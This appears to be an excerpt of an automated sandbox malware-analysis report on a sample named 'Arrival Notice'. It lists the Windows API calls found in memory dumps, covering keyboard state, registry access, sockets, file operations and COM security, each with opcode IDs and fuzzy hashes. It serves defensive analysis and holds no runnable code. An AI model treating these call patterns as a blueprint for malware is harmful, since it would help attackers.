                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0040F454
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: 61d6c536276c81a4f5f425bb7c87ea5ae5715534bb2ef9e1d8396eafd57ed167
                  • Instruction ID: 4348a4535b0215f9cb5c5d663f5e6de501067dd952e6cf3444d347fe37c83ed4
                  • Opcode Fuzzy Hash: 61d6c536276c81a4f5f425bb7c87ea5ae5715534bb2ef9e1d8396eafd57ed167
                  • Instruction Fuzzy Hash: AE412C31214740BECF7A9B298888F2A7B97AB57314F19443EE447E69A0C736AC84CB15
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00442D1B
                  • GetDC.USER32(00000000), ref: 00442D23
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00442D2E
                  • ReleaseDC.USER32(00000000,00000000), ref: 00442D3A
                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00442D76
                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00442D87
                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00445A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00442DC2
                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00442DE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                  • String ID:
                  • API String ID: 3864802216-0
                  • Opcode ID: 1a3b8a9f78713505ab00856357754e86acbde392b93ad6e25ccc3ef08477db40
                  • Instruction ID: 44125365a9ca60cf48aa8d24c65fb3de5d9bb380c76762a7f0a921968fd967e8
                  • Opcode Fuzzy Hash: 1a3b8a9f78713505ab00856357754e86acbde392b93ad6e25ccc3ef08477db40
                  • Instruction Fuzzy Hash: 72317176102614BFFB514F50CC89FEB3FA9EF0A755F084065FE089A291C6B59C51C7A8
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: bf04dac1c368ea5c80acd0e14a52e3ad34c128e311783272030a736d676cd291
                  • Instruction ID: 467e840e8e5af424e51cab694c3da4d8e0f0ad0187f2d4696fcc0dd4c5f9ec0a
                  • Opcode Fuzzy Hash: bf04dac1c368ea5c80acd0e14a52e3ad34c128e311783272030a736d676cd291
                  • Instruction Fuzzy Hash: 6D2195B6640A09FBE21555219D82FFB235CAEA1384F540023FD089E782F768ED5581ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: NULL Pointer assignment$Not an Object type
                  • API String ID: 0-572801152
                  • Opcode ID: daa99863f034f70c5be92eb50e66f5dbfeb2b240d8bea5a93b86fe5f662dd4eb
                  • Instruction ID: 4b995313861686ad055782eca81f75e68f2d00df3267f00b4e348635017a018e
                  • Opcode Fuzzy Hash: daa99863f034f70c5be92eb50e66f5dbfeb2b240d8bea5a93b86fe5f662dd4eb
                  • Instruction Fuzzy Hash: 3DD1C071A0060AAFDF14CFA8C880BAEB7B5BF48344F14906AE915AB381E775DD45CB94
                  APIs
                  • GetCPInfo.KERNEL32(?,?), ref: 003F15CE
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003F1651
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003F16E4
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003F16FB
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003F1777
                  • __freea.LIBCMT ref: 003F17A2
                  • __freea.LIBCMT ref: 003F17AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                  • String ID:
                  • API String ID: 2829977744-0
                  • Opcode ID: 8e355a04a480975a6e8ce0f6303d6a0054184ad73710c3d8f3257a178f7415f1
                  • Instruction ID: b806bbfccc69a0cc0a78c940b6658f5d9038c7fcaf7d2a0c3eb1b8e1f7bec5e3
                  • Opcode Fuzzy Hash: 8e355a04a480975a6e8ce0f6303d6a0054184ad73710c3d8f3257a178f7415f1
                  • Instruction Fuzzy Hash: B491D672E0021EDADF229F74E881AFE7BB59F45310F190669EA09EB290D735DC44CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                  • API String ID: 2610073882-625585964
                  APIs
                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0042125C
                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00421284
                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004212A8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004212D8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0042135F
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004213C4
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00421430
                  Similarity
                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                  • String ID:
                  • API String ID: 2550207440-0
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 0043396B
                  • CharUpperBuffW.USER32(?,?), ref: 00433A7A
                  • _wcslen.LIBCMT ref: 00433A8A
                  • VariantClear.OLEAUT32(?), ref: 00433C1F
                    • Part of subcall function 00420CDF: VariantInit.OLEAUT32(00000000), ref: 00420D1F
                    • Part of subcall function 00420CDF: VariantCopy.OLEAUT32(?,?), ref: 00420D28
                    • Part of subcall function 00420CDF: VariantClear.OLEAUT32(?), ref: 00420D34
                  Strings
                  Similarity
                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                  • API String ID: 4137639002-1221869570
                  APIs
                    • Part of subcall function 0041000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?,?,0041035E), ref: 0041002B
                    • Part of subcall function 0041000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410046
                    • Part of subcall function 0041000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410054
                    • Part of subcall function 0041000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?), ref: 00410064
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00434C51
                  • _wcslen.LIBCMT ref: 00434D59
                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00434DCF
                  • CoTaskMemFree.OLE32(?), ref: 00434DDA
                  Strings
                  Similarity
                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                  • String ID: NULL Pointer assignment
                  • API String ID: 614568839-2785691316
                  APIs
                  • GetMenu.USER32(?), ref: 00442183
                  • GetMenuItemCount.USER32(00000000), ref: 004421B5
                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004421DD
                  • _wcslen.LIBCMT ref: 00442213
                  • GetMenuItemID.USER32(?,?), ref: 0044224D
                  • GetSubMenu.USER32(?,?), ref: 0044225B
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004422E3
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Similarity
                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                  • String ID:
                  • API String ID: 4196846111-0
                  APIs
                  • GetParent.USER32(?), ref: 0041AEF9
                  • GetKeyboardState.USER32(?), ref: 0041AF0E
                  • SetKeyboardState.USER32(?), ref: 0041AF6F
                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0041AF9D
                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0041AFBC
                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 0041AFFD
                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0041B020
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  APIs
                  • GetParent.USER32(00000000), ref: 0041AD19
                  • GetKeyboardState.USER32(?), ref: 0041AD2E
                  • SetKeyboardState.USER32(?), ref: 0041AD8F
                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0041ADBB
                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0041ADD8
                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0041AE17
                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0041AE38
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  APIs
                  • GetConsoleCP.KERNEL32(003F3CD6,?,?,?,?,?,?,?,?,003E5BA3,?,?,003F3CD6,?,?), ref: 003E5470
                  • __fassign.LIBCMT ref: 003E54EB
                  • __fassign.LIBCMT ref: 003E5506
                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,003F3CD6,00000005,00000000,00000000), ref: 003E552C
                  • WriteFile.KERNEL32(?,003F3CD6,00000000,003E5BA3,00000000,?,?,?,?,?,?,?,?,?,003E5BA3,?), ref: 003E554B
                  • WriteFile.KERNEL32(?,?,00000001,003E5BA3,00000000,?,?,?,?,?,?,?,?,?,003E5BA3,?), ref: 003E5584
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  APIs
                    • Part of subcall function 0043304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                    • Part of subcall function 0043304E: _wcslen.LIBCMT ref: 0043309B
                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00431112
                  • WSAGetLastError.WSOCK32 ref: 00431121
                  • WSAGetLastError.WSOCK32 ref: 004311C9
                  • closesocket.WSOCK32(00000000), ref: 004311F9
                  Similarity
                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 2675159561-0
                  APIs
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0041CF22,?), ref: 0041DDFD
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0041CF22,?), ref: 0041DE16
                  • lstrcmpiW.KERNEL32(?,?), ref: 0041CF45
                  • MoveFileW.KERNEL32(?,?), ref: 0041CF7F
                  • _wcslen.LIBCMT ref: 0041D005
                  • _wcslen.LIBCMT ref: 0041D01B
                  • SHFileOperationW.SHELL32(?), ref: 0041D061
                  Strings
                  Similarity
                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                  • String ID: \*.*
                  • API String ID: 3164238972-1173974218
                  APIs
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00442E1C
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442E4F
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442E84
                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00442EB6
                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00442EE0
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442EF1
                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00442F0B
                  Similarity
                  • API ID: LongWindow$MessageSend
                  • String ID:
                  • API String ID: 2178440468-0
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417769
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041778F
                  • SysAllocString.OLEAUT32(00000000), ref: 00417792
                  • SysAllocString.OLEAUT32(?), ref: 004177B0
                  • SysFreeString.OLEAUT32(?), ref: 004177B9
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 004177DE
                  • SysAllocString.OLEAUT32(?), ref: 004177EC
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417842
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417868
                  • SysAllocString.OLEAUT32(00000000), ref: 0041786B
                  • SysAllocString.OLEAUT32 ref: 0041788C
                  • SysFreeString.OLEAUT32 ref: 00417895
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 004178AF
                  • SysAllocString.OLEAUT32(?), ref: 004178BD
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  APIs
                  • GetStdHandle.KERNEL32(0000000C), ref: 004204F2
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0042052E
                  Strings
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 004205C6
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00420601
                  Strings
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  APIs
                    • Part of subcall function 003B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                    • Part of subcall function 003B600E: GetStockObject.GDI32(00000011), ref: 003B6060
                    • Part of subcall function 003B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00444112
                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044411F
                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044412A
                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00444139
                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00444145
                  Similarity
                  • API ID: MessageSend$CreateObjectStockWindow
                  • String ID: Msctls_Progress32
                  • API String ID: 1025951953-3636473452
                  • Opcode ID: ae3ac5719da8dd18002e8247476271b6856bc71b8d408c96249507bea41ba1f6
                  • Instruction ID: 0b8092d52230c75e47b6388a1417165de0d846fb09731ee54f02b9c0a1d11ce6
                  • Opcode Fuzzy Hash: ae3ac5719da8dd18002e8247476271b6856bc71b8d408c96249507bea41ba1f6
                  • Instruction Fuzzy Hash: 7D1190B2140219BEFF119F64CC86EEB7F5DEF08798F018112BA18A6150C6769C219BA8
                  APIs
                    • Part of subcall function 003ED7A3: _free.LIBCMT ref: 003ED7CC
                  • _free.LIBCMT ref: 003ED82D
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003ED838
                  • _free.LIBCMT ref: 003ED843
                  • _free.LIBCMT ref: 003ED897
                  • _free.LIBCMT ref: 003ED8A2
                  • _free.LIBCMT ref: 003ED8AD
                  • _free.LIBCMT ref: 003ED8B8
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction ID: 0c8b3e8711a8d181747dd8b42817036b14a00d01193a8e5d68d28c0ed51a7455
                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction Fuzzy Hash: 0A115171540BA8AAD523BFB2CC47FCB7BDC6F01700F400A25B699AE0D3DB7AB5154650
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0041DA74
                  • LoadStringW.USER32(00000000), ref: 0041DA7B
                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0041DA91
                  • LoadStringW.USER32(00000000), ref: 0041DA98
                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0041DADC
                  Strings
                  • %s (%d) : ==> %s: %s %s, xrefs: 0041DAB9
                  Similarity
                  • API ID: HandleLoadModuleString$Message
                  • String ID: %s (%d) : ==> %s: %s %s
                  • API String ID: 4072794657-3128320259
                  • Opcode ID: b2705dfc821058e86e6b8b4193499ae2bd9f5876f6c4e59ccaf09f6e86eaf01d
                  • Instruction ID: 1d99d81826bf66dfda973ed91a58434d1d904d0087c1db6a3f88c6aa52496a3f
                  • Opcode Fuzzy Hash: b2705dfc821058e86e6b8b4193499ae2bd9f5876f6c4e59ccaf09f6e86eaf01d
                  • Instruction Fuzzy Hash: 400162F69002087FE750DBA09DC9EE7326CEB09305F4444A6B706E2041EA789E844F78
                  APIs
                  • InterlockedExchange.KERNEL32(010DF9C0,010DF9C0), ref: 0042097B
                  • EnterCriticalSection.KERNEL32(010DF9A0,00000000), ref: 0042098D
                  • TerminateThread.KERNEL32(010D9CB8,000001F6), ref: 0042099B
                  • WaitForSingleObject.KERNEL32(010D9CB8,000003E8), ref: 004209A9
                  • CloseHandle.KERNEL32(010D9CB8), ref: 004209B8
                  • InterlockedExchange.KERNEL32(010DF9C0,000001F6), ref: 004209C8
                  • LeaveCriticalSection.KERNEL32(010DF9A0), ref: 004209CF
                  Similarity
                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                  • String ID:
                  • API String ID: 3495660284-0
                  • Opcode ID: 0847c471ae0d76fa9fbaa8bd52e3e6949346535e11c550ef7a04e395b3e205ee
                  • Instruction ID: f51fe7c7defecf2e23fe6c1988488cb998835a052f0d643651b994cf5310da68
                  • Opcode Fuzzy Hash: 0847c471ae0d76fa9fbaa8bd52e3e6949346535e11c550ef7a04e395b3e205ee
                  • Instruction Fuzzy Hash: 10F03171543912BBD7915F94EECCBD67B35FF06702F841026F102908A1C7B59465CF98
                  APIs
                  • GetClientRect.USER32(?,?), ref: 003B5D30
                  • GetWindowRect.USER32(?,?), ref: 003B5D71
                  • ScreenToClient.USER32(?,?), ref: 003B5D99
                  • GetClientRect.USER32(?,?), ref: 003B5ED7
                  • GetWindowRect.USER32(?,?), ref: 003B5EF8
                  Similarity
                  • API ID: Rect$Client$Window$Screen
                  • String ID:
                  • API String ID: 1296646539-0
                  • Opcode ID: 6de29e324b3988908fb5a2d2792f2266ddfe666cbe11b4a296294b16af008e6d
                  • Instruction ID: e65f54c46be322f974774e9490c4385c48190e8a2c095624ff67362f1a8d4104
                  • Opcode Fuzzy Hash: 6de29e324b3988908fb5a2d2792f2266ddfe666cbe11b4a296294b16af008e6d
                  • Instruction Fuzzy Hash: A0B17738A00A4ADBDB11CFA8C4807FAB7F5FF48314F14851AE9A9D7A50DB30EA51CB54
                  APIs
                  • __allrem.LIBCMT ref: 003E00BA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E00D6
                  • __allrem.LIBCMT ref: 003E00ED
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E010B
                  • __allrem.LIBCMT ref: 003E0122
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E0140
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction ID: d43e01aec580bdefcf3bd480fa0576136fe9d799202052bd6874d2571d8f6d39
                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction Fuzzy Hash: 9A8135766007569FE726AF2ADC81B6BB3A8AF41720F25433AF511DA3C1E7B0D9408780
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003D82D9,003D82D9,?,?,?,003E644F,00000001,00000001,8BE85006), ref: 003E6258
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003E644F,00000001,00000001,8BE85006,?,?,?), ref: 003E62DE
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003E63D8
                  • __freea.LIBCMT ref: 003E63E5
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • __freea.LIBCMT ref: 003E63EE
                  • __freea.LIBCMT ref: 003E6413
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 0a6ac154af366e8a51c1c26c3db437131fcc3af85fbd2d6c366b8ea6f23d4579
                  • Instruction ID: 1f683cbff0792da66a772b090590c7b045685109aef0cce66db13ff8be4f4284
                  • Opcode Fuzzy Hash: 0a6ac154af366e8a51c1c26c3db437131fcc3af85fbd2d6c366b8ea6f23d4579
                  • Instruction Fuzzy Hash: C551D3726002A6ABDB278F66CC82EAF77A9EB54790F164729FD05DB1D0DB34DC40C660
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043BCCA
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043BD25
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043BD6A
                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0043BD99
                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0043BDF3
                  • RegCloseKey.ADVAPI32(?), ref: 0043BDFF
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                  • String ID:
                  • API String ID: 1120388591-0
                  • Opcode ID: 32ec6b9a5e873b6852547a20962361c460723af4e5c1d9eb990b2db79c9a3321
                  • Instruction ID: db41fb734c65e215cc2e3d01d29441395809fd2957763982cb6726dbf63ccb04
                  • Opcode Fuzzy Hash: 32ec6b9a5e873b6852547a20962361c460723af4e5c1d9eb990b2db79c9a3321
                  • Instruction Fuzzy Hash: FD81A030208241AFC715DF24C881F6ABBE5FF88308F14955EF6598B2A2CB35ED05CB92
                  APIs
                  • VariantInit.OLEAUT32(00000035), ref: 0040F7B9
                  • SysAllocString.OLEAUT32(00000001), ref: 0040F860
                  • VariantCopy.OLEAUT32(0040FA64,00000000), ref: 0040F889
                  • VariantClear.OLEAUT32(0040FA64), ref: 0040F8AD
                  • VariantCopy.OLEAUT32(0040FA64,00000000), ref: 0040F8B1
                  • VariantClear.OLEAUT32(?), ref: 0040F8BB
                  Similarity
                  • API ID: Variant$ClearCopy$AllocInitString
                  • String ID:
                  • API String ID: 3859894641-0
                  • Opcode ID: e4329b1b7e68f21005c78770044becb64442ff68135f05375b539ace295d3cef
                  • Instruction ID: bba5bf2ef0627d2a6bb88bef52e4f1c1c891f90662f82e7fbbf1bc60ccdc7bc8
                  • Opcode Fuzzy Hash: e4329b1b7e68f21005c78770044becb64442ff68135f05375b539ace295d3cef
                  • Instruction Fuzzy Hash: 77510575600300AACF30AB65D885B69B3A4EF45314B24847BE902EF6D1DB7C8C44CBAB
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • GetOpenFileNameW.COMDLG32(00000058), ref: 004294E5
                  • _wcslen.LIBCMT ref: 00429506
                  • _wcslen.LIBCMT ref: 0042952D
